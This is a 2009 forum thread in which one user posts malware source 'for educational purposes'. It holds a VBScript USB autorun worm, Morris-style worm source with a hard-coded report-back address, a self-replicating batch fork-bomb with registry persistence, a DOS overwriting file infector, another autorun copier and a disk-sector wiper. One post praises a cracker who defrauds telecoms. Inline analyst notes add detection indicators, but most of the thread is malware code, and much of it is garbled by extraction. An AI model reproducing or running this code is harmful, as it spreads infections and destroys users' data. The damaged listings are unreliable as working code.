Author Topic: VIRUS codes for educational purposes only!  (Read 979 times)
jover619
« on: February 06, 2009, 12:22:44 AM »

This is for educational purposes only. Do not modify it, ok? Just study the code and its behavior so that you will know how to avoid/delete these viruses.
THIS IS FOR EDUCATIONAL PURPOSES ONLY, BUT THE HAZARDS ARE REAL, SO DO NOT COMPILE THIS! PROMISE?

jover619
« Reply #1 on: February 06, 2009, 12:26:14 AM »

Quote
'THIS IS A MODIFIED VERSION BY: F. E. SILVA
'MABUHAY ANG LIPA
' ---- Analyst notes (defensive reading of the quoted sample) ----
' Removable-drive "autorun" script worm. The listing is kept exactly as posted; it is
' damaged by extraction (stray spaces inside identifiers, a typographic quote in the
' Run-key line).
' Indicators visible in this listing:
'   - FS6519.dll.vbs in the Windows folder and in drive roots
'   - autorun.inf in a drive root whose [autorun] section starts wscript.exe
'   - a value named FS6519 under HKLM\Software\Microsoft\Windows\CurrentVersion\Run
'   - Internet Explorer "Window Title" set to "TAGA LIPA ARE!"
' Mitigation pointers: disable AutoRun for removable media, inspect drive roots with
' hidden and protected system files shown, and monitor Run-key writes made by script hosts.
' Runtime errors are suppressed, so every failing step below is silent.
on error resume next
dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd
' atr is the autorun.inf text dropped on each drive; it asks AutoRun to launch the
' script through wscript.exe.
atr = "[autorun]"&vbcrl&"shellexecute=wscript.exe FS6519.dll.vbs"
set fs = createobj ct("Scripting.FileSystemObject")
set m f = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
' check = type of the drive this copy runs from (1 is "removable" in the
' FileSystemObject drive-type numbering).
check = mf.drive.drivetype
' Reads its own script file into mysource; that buffer is what gets written out later.
set text=mf.opentextstream(1,-2)
do while not text.atendofstream
mysource=mysource&text.readline
source= mysource & vbcrl
loop
do
' Special folder 0 is the Windows directory.
Set winpath = fs.getspecialfolder(0)
' Attribute value 32 is Archive only: any read-only/hidden/system bits on an existing
' copy are cleared before it is overwritten.
set tf = fs.getfile(winpath & "\FS6519.dll.vbs")
tf.attributes = 32
set tf=fs.createtextfile(winpath & "\FS6519.dll.vbs",2,true)
tf.write mysource
tf.close
set tf = fs.getfile(winpath & "\FS6519.dll.vbs")
tf.attributes = 32
' Walks every drive; the condition selects drive types 1 (removable) and 2 (fixed),
' skipping A:.
for each flashdrive in fs.drives
If (flas hdrive.drivetype = 1 or flashdrive.d rivetype = 2) and flashdrive.path <> "A:" then
set tf=fs.getfile(flashdrive.path &"\FS6519.dll.vbs")
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &"\FS6519.dll.vbs",2,true)
tf.write mysource
tf.close
set tf=fs.g etfile(flashdrive.path &"\FS6519.dll.vbs")
' 39 = ReadOnly + Hidden + System + Archive: the dropped copy does not show in a
' default Explorer view.
tf.attributes =39
set tf =fs .getfile(flashdrive.path &"\autorun.inf")
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &"\autorun.inf",2,true)
tf.write atr
tf.close
set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes=39
end if
next
' Persistence: a Run value pointing at the copy in the Windows folder, plus a
' cosmetic change to the Internet Explorer window title (a user-visible symptom).
set rg =  createobject("WScript.Shell")
rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\FS6519″,winpath&"\FS6519.dll.vbs"
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title","TAGA LIPA ARE!"
' When this copy was not started from a removable drive it sleeps 200001 ms and
' repeats the whole pass, so drives attached later are also written to.
if check < > 1 then
Wscript.sleep 200001
end if
loop while check<>1
' Reached only when started from a removable drive: opens an Explorer window on the
' script's own location - presumably so the drive still appears to open normally.
set sd = createobject("Wscript.shell")
sd.run winpath&"\explorer.exe /e,/ select, "&Wscript.ScriptFullname

jover619
« Reply #2 on: February 06, 2009, 12:45:04 AM »

worm!
Quote
666 The Dead Zone 214-522-5321 300/1200/2400 666

#include

#include

#include

#include



long current_time;

struct rlimit no_core = {0,0};



/*
 * Analyst note: entry point of an annotated worm outline. The listing is pseudo-C as
 * posted (header names are missing, several lines do not parse) and the helpers it
 * calls - load_object(), if_init(), rt_init(), doit() callees - are not shown here.
 * Behaviours a defender can read off this function:
 *   - process masquerading: argv[0] is overwritten with "sh"
 *   - anti-forensics: the core-file limit is set to 0, and each file named on the
 *     command line is unlinked after loading when a parent pid was supplied
 *   - "-p <pid>" carries the parent's process id, which is signalled later
 *   - the program exits unless an argument starting with "1l.c" was present
 */
int

main (argc, argv)

   int argc;

   char *argv[];



{

   int n;

   int parent = 0;

   int okay = 0;

      /* change calling name to "sh" */

   strcpy(argv[0], "sh");

      /* prevent core files by setting limit to 0 */

   setrlimit(RLIMIT_CORE, no_core);

   current_time = time(0);

      /* seed random number generator with time */

   srand48(current_time);

   n = 1;

   while (argv[n]) {

      /* save process id of parent */

      if (!strncmp(argv[n], "-p", 2)) {

         parent = atoi (argv[++n]);

         n++;

      }

      else {

         /* check for 1l.c in argument list */

         if (!strncmp(argv([n], "1l.c", 4))

            okay = 1;

         /* load an object file into memory */

         load_object (argv[n];

         /* clean up by unlinking file */

         if (parent)

            unlink (argv[n]);

         /* and removing object file name */
         /* (the argument string is emptied, so it no longer shows in the argument list) */

         strcpy (argv[n++], "");

      }

   

   }

      /* if 1l.c was not in argument list, quit */

   if (!okay)

      exit (0);

      /* reset process group */

   setpgrp (getpid());

      /* kill parent shell if parent is set */

   if (parent)

      kill(parent, SIHGUP);

      /* scan for network interfaces */

   if_init();

      /* collect list of gateways from netstat */

   rt_init();

      /* start main loop */

   doit();

}



/*
 * Analyst note: main loop of the outline. Every routine called here (attack_hosts,
 * check_other, send_message, crack_some, other_sleep, reset_hosts) is defined
 * elsewhere and not shown, so only the control flow can be described:
 *   - reseeds the random generator, runs one attack/check/report pass, then loops
 *   - on each pass the process forks and the parent exits, so the process id keeps
 *     changing - tracking by pid alone will lose it
 *   - the host list is reset when the 12-hour test below matches
 *   - the loop ends only when pleasequit is set and nextw exceeds the threshold
 * The loop header below was mangled by the forum's emoticon rendering.
 */
int

doit()

{

   current_time = time (1);

      /* seed random number generator (again) */

   srand48(current_time);

      /* attack gateways, local nets, remote nets */

   attack_hosts();

      /* check for a "listening" worm */

   check_other ()

      /* attempt to send byte to "ernie" */

   send_message ()

   for (;Wink {

      /* crack some passwords */

   crack_some ();

      /* sleep or listen for other worms */

   other_sleep (3);

   crack_some ();

      /* switch process id's */

      if (fork())

         /* parent exits, new worm continues */

         exit (0);

      /* attack gateways, known hosts */

      attack_hosts();

      other_sleep(12);

         /* if 12 hours have passed, reset hosts */

      if(time (0) == current_time + (3600*12)) {

         reset_hosts();

         current_time = time(0); }

         /* quit if pleasequit is set, and nextw>10 */

      if (pleasequit && nextw > 1)

         exit (0);

   }

}

jover619
« Reply #3 on: February 06, 2009, 12:50:12 AM »

Dover Worm is a worm that can harm your system. With the help of Dover Worm, a hacker can get remote access to your computer.
Quote
/* Dover */

#include "worm.h"
#include <stdio.h>
#include <signal.h>
#include <strings.h>
#include <sys/param.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/resource.h>
#include <sys/socket.h>
#include <sys/fcntl.h>
#include <sys/stat.h>
#include <netinet/in.h>
#include <net/if.h>
#include <arpa/inet.h>

extern errno;
extern char *malloc();

int pleasequit;               /* See worm.h */
int nobjects = 0;
int nextw;
char *null_auth;

object objects[69];            /* Don't know how many... */

object *getobjectbyname();

char *XS();

/*
 * Analyst note: start-up routine of the quoted worm source. Array subscripts were
 * lost in forum rendering, so several lines are not valid C as posted; the listing is
 * left untouched. loadobject(), getobjectbyname(), if_init() and mainloop() callees
 * are defined outside this function.
 * Host-side behaviours visible here:
 *   - argv[0] overwritten with "sh" (process-name masquerading)
 *   - core dumps disabled via RLIMIT_CORE = 0, SIGPIPE ignored
 *   - optional "-p <pid>": the named process is later sent signal 9
 *   - files given as arguments are loaded, then unlinked when -p was used
 *   - with -p: descriptors 0..31 closed; argv[0], "sh" and "/tmp/.dumb" unlinked
 *   - the argument strings are zeroed afterwards
 * Forensic consequence: little is left on disk or in the argument list, so evidence
 * has to come from process, network and memory observation.
 */
main(argv, argc)      /* 0*20a0 */
     int argc;
     char **argv;
{
    int i, l8, pid_arg, j, cur_arg, unused;
    long key;         /* -28(fp) */
    struct rlimit rl;
   
    l8 = 0;               /* Unused */
   
    strcpy(argv[0], XS("sh"));         /* <env+52> */
    time(&key);
    srandom(key);
    /* Core-file size limit forced to zero; the result of setrlimit is ignored. */
    rl.rlim_cur = 0;
    rl.rlim_max = 0;
    if (setrlimit(RLIMIT_CORE, &rl))
   ;
    signal(SIGPIPE, SIG_IGN);
    pid_arg = 0;
    cur_arg = 1;
    if  (argc > 2 &&
    strcmp(argv[cur_arg], XS("-p")) == 0) { /* env55 == "-p" */
   pid_arg = atoi(argv[2]);
   cur_arg += 2;
    }
    /* Load every remaining argument as an object; remove the file when -p was given. */
    for(i = cur_argv; i < argc; i++) {   /* otherwise <main+286> */
   if (loadobject(argv) == 0)
       exit(1);
   if (pid_arg)
       unlink(argv);
    }
    /* Exits unless at least one object was loaded and one is named "l1.c". */
    if ((nobjects < 1) || (getobjectbyname(XS("l1.c")) == NULL))
   exit(1);
    if (pid_arg) {
   for(i = 0; i < 32; i++)
       close(i);
   unlink(argv[0]);
   unlink(XS("sh"));         /* <env+63> */
   unlink(XS("/tmp/.dumb"));      /* <env+66>"/tmp/.dumb"
 */
    }
   
    /* Blank out the argument strings. */
    for (i = 1; i < argc; i++)
   for (j = 0;   argv[j]; j++)
       argc[j] = '\0';
    if (if_init() == 0)
   exit(1);
    if (pid_arg) {               /* main+600 */
   if (pid_arg == getpgrp(getpid()))
       setpgrp(getpid(), getpid());
   kill(pid_arg, 9);
    }
    mainloop();
}

/*
 * Analyst note: steady-state loop. hg(), hl(), ha(), hi(), checkother(), cracksome(),
 * other_sleep() and h_clean() are opaque here (defined elsewhere), so only the
 * scheduling is described:
 *   - one initial pass, then an endless loop
 *   - each pass forks and lets the parent exit, so the process id changes every
 *     iteration
 *   - h_clean() is called once at least 12 hours have elapsed since time0 (time0 is
 *     never updated in this listing)
 *   - the loop exits when pleasequit is set and nextw > 0 (both are globals declared
 *     earlier in the listing)
 */
static mainloop()            /* 0x2302 */
{
    long key, time1, time0;
   
    time(&key);
    srandom(key);
    time0 = key;
    if (hg() == 0 && hl() == 0)
   ha();
    checkother();
    report_breakin();
    cracksome();
    other_sleep(30);
    while (1) {
   /* Crack some passwords */
   cracksome();
   /* Change my process id */
   if (fork() > 0)
       exit(0);
   if (hg() == 0 && hi() == 0 && ha() == 0)
       hl();
   other_sleep(120);
   time(&time1);
   if (time1 - time0 >= 60*60*12)
       h_clean();
   if (pleasequit && nextw > 0)
       exit(0);
    }
}

/* Scratch state for XS(): write offset into, and storage for, decoded strings. */
static trans_cnt;
static char trans_buf[NCARGS];

/*
 * Analyst note: string de-obfuscation helper. Without ENCYPHERED_STRINGS it returns
 * its argument unchanged. With it, the string is copied into trans_buf while being
 * XORed with 0x81, and the offset wraps to 0 when the buffer would overflow.
 * Relevance for analysis: in a build with ENCYPHERED_STRINGS the literals would be
 * stored XOR-0x81 encoded, so a plain strings scan would not show them; applying the
 * same XOR recovers them. Subscripts in the loop below were lost in forum rendering.
 */
char *XS(str1)         /* 0x23fc */
     char *str1;
{
    int i, len;
    char *newstr;
#ifndef ENCYPHERED_STRINGS
    return str1;
#else 
    len = strlen(str1);
    if (len + 1 > NCARGS - trans_cnt)
   trans_cnt = 0;
    newstr = &trans_buf[trans_cnt];
    trans_cnt += 1 + len;
    for (i = 0; str1; i++)
   newstr = str1^0x81;
    newstr = '\0';
    return newstr;
#endif
}

/* This reports a successful break-in by sending a single byte to "203.177.73.176"
 * (whoever that is).
 *
 * Analyst note: the report is attempted only when random() % 15 equals 7, i.e. on
 * roughly one call in fifteen. The destination port is REPORT_PORT, which comes from
 * worm.h and is not shown on this page. The byte sent (msg) is never initialised and
 * the result of sendto() is ignored. The address is reproduced as quoted in the post
 * and should be treated as unverified. Network indicator: an outbound one-byte
 * message from an infected host to that address and port. */

static report_breakin(arg1, arg2)      /* 0x2494 */
{
    int s;
    struct sockaddr_in sin;
    char msg;
   
    if (7 != random() % 15)
   return;
   
    bzero(&sin, sizeof(sin));
    sin.sin_family = AF_INET;
    sin.sin_port = REPORT_PORT;
    sin.sin_addr.s_addr = inet_addr(XS("203.177.73.176"));
                  /* <env+77>"203.177.73.176" */
   
    s = socket(AF_INET, SOCK_STREAM, 0);
    if (s < 0)
   return;
    if (sendto(s, &msg, 1, 0, &sin, sizeof(sin)))
   ;
    close(s);
}

/* End of first file in the original source.
 * (Indicated by extra zero word in text area.) */

/*
 * Local variables:
 * compile-command: "make"
 * comment-column: 48
 * End:
 */

jover619
« Reply #4 on: February 06, 2009, 12:52:37 AM »

BATotoy!
Quote
@echo off
REM ---- Analyst notes (defensive reading of the quoted sample) ----
REM Two stages: (1) builds C:\1.reg and imports it silently to add start-up entries,
REM (2) builds C:\2.bat, a script that copies and relaunches itself in an endless
REM loop, which exhausts processes and disk activity on the machine.
REM Indicators visible in this listing: C:\1.reg; C:\1.bat .. C:\5.bat;
REM C:\windows\1.bat .. 3.bat; start-up values named MSConfig, MSUpdateExe, explorer,
REM Norton, System and autorun.inf that point at .bat files; regedit.exe run with /s
REM from a script. The registry key path is shown exactly as posted (it contains an
REM extraction artifact).
del C:\1.reg
REM ">>" appends, so the .reg file is assembled one line per ECHO.
>>"C:\1.reg" ECHO Windows Registry Editor Version 5.00
>>"C:\1.reg" ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Cur entVersion\Run]
>>"C:\1.reg" ECHO "MSConfig"="C:\\1.bat "
>>"C:\1.reg" ECHO "MSUpdateExe"="c:\\2.bat"
>>"C:\1.reg" ECHO "explorer"="c:\\3.bat"
>>"C:\1.reg" ECHO "Norton"="c:\\windows\\1.bat"
>>"C:\1.reg" ECHO "System"="c:\\windows\\2.bat"
>>"C:\1.reg" ECHO "autorun.inf"="c:\\windows\\3.bat"
REM /s imports without showing a confirmation dialog.
regedit.exe /s C:\1.reg

REM Second stage: C:\2.bat is appended to (never cleared first), then started.
>>"C:\2.bat" ECHO :1
>>"C:\2.bat" ECHO copy 2.bat C:\3.bat
>>"C:\2.bat" ECHO copy 2.bat C:\4.bat
>>"C:\2.bat" ECHO copy 2.bat C:\5.bat
>>"C:\2.bat" ECHO start C:\2.bat
>>"C:\2.bat" ECHO start C:\3.bat
>>"C:\2.bat" ECHO start C:\4.bat
>>"C:\2.bat" ECHO start C:\5.bat
>>"C:\2.bat" ECHO copy C:\2.bat C:\windows\1.bat
>>"C:\2.bat" ECHO copy C:\3.bat C:\windows\2.bat
>>"C:\2.bat" ECHO copy C:\4.bat C:\windows\3.bat
>>"C:\2.bat" ECHO start C:\windows\1.bat
>>"C:\2.bat" ECHO start C:\windows\2.bat
>>"C:\2.bat" ECHO start C:\windows\3.bat
>>"C:\2.bat" ECHO goto 1

start C:\2.bat

jover619
« Reply #5 on: February 06, 2009, 12:57:21 AM »

Quote
/* C-Virus: A generic .COM and .EXE infector

Written by Nowhere Man

Project started and completed on 6-24-91

*/

#pragma inline //

#include
#include
#include
#include
#include

void hostile_activity(void);
int infected(char *);
void spread(char *, char *);
void small_print(char *);
char *victim(void);

#define DEBUG
#define ONE_KAY 1024 // 1k
#define TOO_SMALL ((7 * ONE_KAY) + 300) // 6k+ size minimum
#define SIGNATURE "NMAN" // Sign of infection

int main(void)
{
/* The main program */
/* Analyst note: one target per run - victim() picks a file, spread() overwrites it
   with this program. The "Out of memory" text and exit status 1 are a decoy: the
   user sees a plausible failure instead of the program they meant to start. */

spread(_argv[0], victim()); // Perform infection
small_print("Out of memory\r\n"); // Print phony error
return(1); // Fake failure...
}

void hostile_activity(void)
{
/* Put whatever you feel like doing here...I chose to
make this part harmless, but if you're feeling
nasty, go ahead and have some fun... */
/* Analyst note: payload stub. As listed it only prints a message (three bell
   characters first) and terminates with exit status 2. It is reached from victim()
   when no further target is found. */

small_print("\a\a\aAll files infected. Mission complete.\r\n");
exit(2);
}

int infected(char *fname)
{
/* This function determines if fname is infected */
/* Analyst note: the infection marker is the 4-byte SIGNATURE ("NMAN", defined near
   the top of the listing) read from file offset 28. Returns non-zero when the bytes
   match. For detection, the same test - those four bytes at offset 28 of a .COM or
   .EXE file - identifies files this listing would treat as already infected.
   The fopen() result is not checked, and the DEBUG printf prints sig although only
   four of its five bytes are filled. */

FILE *fp; // File handle
char sig[5]; // Virus signature

f p = fopen(fname, "rb");
f seek(fp, 28L, SEEK_SET);
f read(sig, sizeof(sig) - 1, 1, fp);
#ifdef DEBUG
printf("Signature for %s: %s\n", fname, sig);
#endif
fclose(fp);
return(strncmp(sig, SIGNATURE, sizeof(sig) - 1) == 0);
}

void small_print(char *string)
{
/* This function is a small, quick print routine */
/* Analyst note: prints a NUL-terminated string one character at a time with BIOS
   video interrupt 0x10, function 0x0E (teletype output), using compiler inline
   assembly. SI is saved on entry and restored at the end. Real-mode DOS code only. */

asm {
push si
mov si,string
mov ah,0xE
}

print: asm {
lodsb
or al,al
je finish
int 0x10
jmp short print
}
finish: asm pop si
}

void spread(char *old_name, char *new_name)
{
/* This function infects new_name with old_name */
/* Analyst note: this is an overwriting infector. The target (new_name) is deleted
   and recreated with the contents of the running program (old_name); the original
   program is not preserved anywhere, so an affected file can only be recovered from
   backup. To hide the change, the recreated file is given the target's previous
   attributes, is resized to the target's previous length, and gets the previous
   timestamp back - a directory listing therefore looks unchanged, while a content
   hash or integrity check does not. No return value of fopen/malloc/fread is checked.
   One comment below wrapped in extraction, leaving the word "time" on its own line. */


/* Variable declarations */

FILE *old, *new; // File handles
struct ftime file_time; // Old file date,
time
int attrib; // Old attributes
long old_size, virus_size; // Sizes of files
char *virus_code = NULL; // Pointer to virus
int old_handle, new_handle; // Handles for files


/* Perform the infection */

#ifdef DEBUG
printf("Infecting %s with %s...\n", new_name, old_name);
#endif
old = fopen(old_name, "rb"); // Open virus
new = fopen(new_name, "rb"); // Open victim
old_handle = fileno(old); // Get file handles
new_handle = fileno(new);
old_size = filelength(new_handle); // Get old file size
virus_size = filelength(old_handle); // Get virus size
attrib = _chmod(new_name, 0); // Get old attributes
getftime(new_handle, &file_time); // Get old file time
fclose(new); // Close the virusee
_chmod(new_name, 1, 0); // Clear any read-only
unlink(new_name); // Erase old file
new = fopen(new_name, "wb"); // Open new virus
new_handle = fileno(new);
virus_code = malloc(virus_size); // Allocate space
fread(virus_code, virus_size, 1, old); // Read virus from old
fwrite(virus_code, virus_size, 1, new); // Copy virus to new
_chmod(new_name, 1, attrib); // Replace attributes
chsize(new_handle, old_size); // Replace old size
setftime(new_handle, &file_time); // Replace old time


/* Clean up */

fcloseall(); // Close files
free(virus_code); // Free memory
}

char *victim(void)
{
/* This function returns the virus's next victim */
/* Analyst note: target selection. If a first command-line argument names a file that
   can be opened, that file is returned. Otherwise the current directory is searched
   with findfirst/findnext using the patterns in types[], including read-only, hidden,
   system and archive files. A candidate is returned when infected() reports no marker
   and its size is above TOO_SMALL ((7 * 1024) + 300 bytes per the #defines). When
   nothing qualifies, hostile_activity() is called, which exits the program.
   The returned name points into a static ffblk, so it is only valid until the next
   search. Scope as listed: the current directory only. */


/* Variable declarations */

char *types[1] = {"*.EXE", "*.COM"}; // Potential victims
static struct ffblk ffblk; // DOS file block
int done; // Indicates finish
int index; // Used for loop


/* Find our victim */

if ((_argc > 1) && (fopen(_argv[1], "rb") != NULL))
return(_argv[1]);

for (index = 0; index < sizeof(types); index++) {
done = findfirst(types[index], &ffblk, FA_RDONLY | FA_HIDDEN |
FA_SYSTEM | FA_ARCH);
while (!done) {
#ifdef DEBUG
printf("Scanning %s...\n", ffblk.ff_name);
#endif
/* If you want to check for specific days of the week,
months, etc., here is the place to insert the
code (don't forget to "#include "!) */

if ((!infected(ffblk.ff_name)) && (ffblk.ff_fsize >
TOO_SMALL))
return(ffblk.ff_name);
done = findnext(&ffblk);
}
}


/* If there are no files left to infect, have a little fun... */

hostile_activity();
return(0); // Prevents warning
}  

jover619
« Reply #6 on: February 06, 2009, 01:05:41 AM »

napulot ko lang na quote..i just wanna share it..
Quote
Some people understand the world and they are the crackers!. Money is not everything. Knowledge is everything. You cannot commercialize the bits and bytes because we already pay our electric bills! Vanity and commerce bring harm to the world. Crackers are the best! Find me if you can!
-aed040
aed040 is one of the best crackers in the country. he is famous in cracking and modifying Opera softwares so that it could connect to the internet for free. he cracked a lot of sys and jar files and he shared it to the world. Maraming company na ang nalulugi dahil sa kanya lalo na ang big 3 telecom networks but mas marami pa rin ang nakikinabang sa ginagawa niya and i'm one of them. haha

what can you say about this? Huh?
« Last Edit: February 06, 2009, 01:10:20 AM by jover619 » Logged

jover619
« Reply #7 on: February 06, 2009, 01:08:50 AM »

IMGKULOT from iloilo
Quote
'imgkulot v1.0
'Iloilo City Phils
'email me if you found this @ jamesgo.dll@gmail.com
'edited from imgkulot on july 2007
' ---- Analyst notes (defensive reading of the quoted sample) ----
' Drive-to-drive copier that relies on autorun.inf. The companion files test.bat,
' autorun.inf and autorun.ico are not shown on this page; test.bat is called with
' "Open", "-" and "+" arguments - presumably toggling file attributes around each
' copy, to be confirmed against that file.
' Indicators visible in this listing: test.vbs / test.* together with autorun.inf
' and autorun.ico in drive roots and in the System folder; winword started by a
' script host.
' Mitigation pointers: disable AutoRun for removable and network drives and inspect
' drive roots with hidden and system files shown.
' Runtime errors are suppressed, so failed copies are silent.
on error resume next
Set WshShell =CreateObject("WScript.Shell")


' The loop runs once unless i is reset to 0 further down, which keeps it going.
For i=1 to 1

set Of = CreateObject("Scripting.FileSystemObject")
' Special folder 1 is the System folder.
set dir = Of.GetSpecialFolder(1)

Set dc = Of.Drives
' isdir = true when this copy is the one installed in the System folder. Otherwise
' test.bat is started hidden (window style 0) and winword is started visibly.
if WScript.ScriptFullName=dir&"\test.vbs" then
isdir=true
else
a=WshShell.Run("test.bat Open" ,0,False)
a=WshShell.Run("winword " ,1,False)
isdir=false
end if

' Drive types selected: 2 (fixed), 3 (network) and 1 (removable, except A: and B:).
For Each d In dc
If d.DriveType = 2 Or d.DriveType = 3 or (d.DriveType = 1 and d<>"A:" and d<> "B:") Then
a=WshShell.Run("test.bat - "&d ,0,True)
if isdir then
Of.CopyFile dir&"\test.*",d&"\",True
Of.CopyFile dir&"\autorun.inf",d&"\",True
Of.CopyFile dir&"\autorun.ico",d&"\",True
else
Of.CopyFile "test.*",d&"\",True
Of.CopyFile "autorun.inf",d&"\",True
Of.CopyFile dir&"\autorun.ico",d&"\",True
end if
a=WshShell.Run("test.bat + "&d ,1,True)
End If
next

' Installed copy: wait 60000 ms, then reset the loop counter so the drive scan repeats.
' Any other copy: install the files into the System folder and finish.
if isdir then
wscript.sleep 60000
i=0
else
a=WshShell.Run("test.bat - "&dir ,0,True)
Of.CopyFile "test.*",dir&"\",True
Of.CopyFile "autorun.inf",dir&"\",True
Of.CopyFile "autorun.ico",dir&"\",True
a=WshShell.Run("test.bat + "&dir ,1,True)
end if

next

jover619
« Reply #8 on: February 06, 2009, 01:13:49 AM »

The Virus Source Code Database (VSCDB) is for information purposes only, for researchers and computer virus or programming enthusiasts. No warranty is given or to be implied for any software listings contained herein. You take full responsibility for any damages caused by compiling, running, or sharing this information. Be aware that running any malicious code on another's computer or computer network might be a criminal act. Use at your own risk!

Quote
Virus Source Code Database :: bomber.c

#include

/* Analyst note: destructive DOS-era sample. abswrite() is the DOS compiler library
   call for absolute sector writes; each call below asks for 50 sectors starting at
   logical sector 0 on drive numbers 0 through 4, with the data taken from vir, a
   pointer that is never initialised. The start of a volume holds its boot and
   allocation structures, so the effect is loss of access to the volume's data rather
   than infection. There is no propagation code in this listing. Recovery relies on
   backups; return values are not checked, and the two messages print regardless. */
main()
{
char *vir;
abswrite(0,50,0,vir);
abswrite(1,50,0,vir);
abswrite(2,50,0,vir);
abswrite(3,50,0,vir);
abswrite(4,50,0,vir);
printf("**** YOU ALL");
printf("The Bomber");
}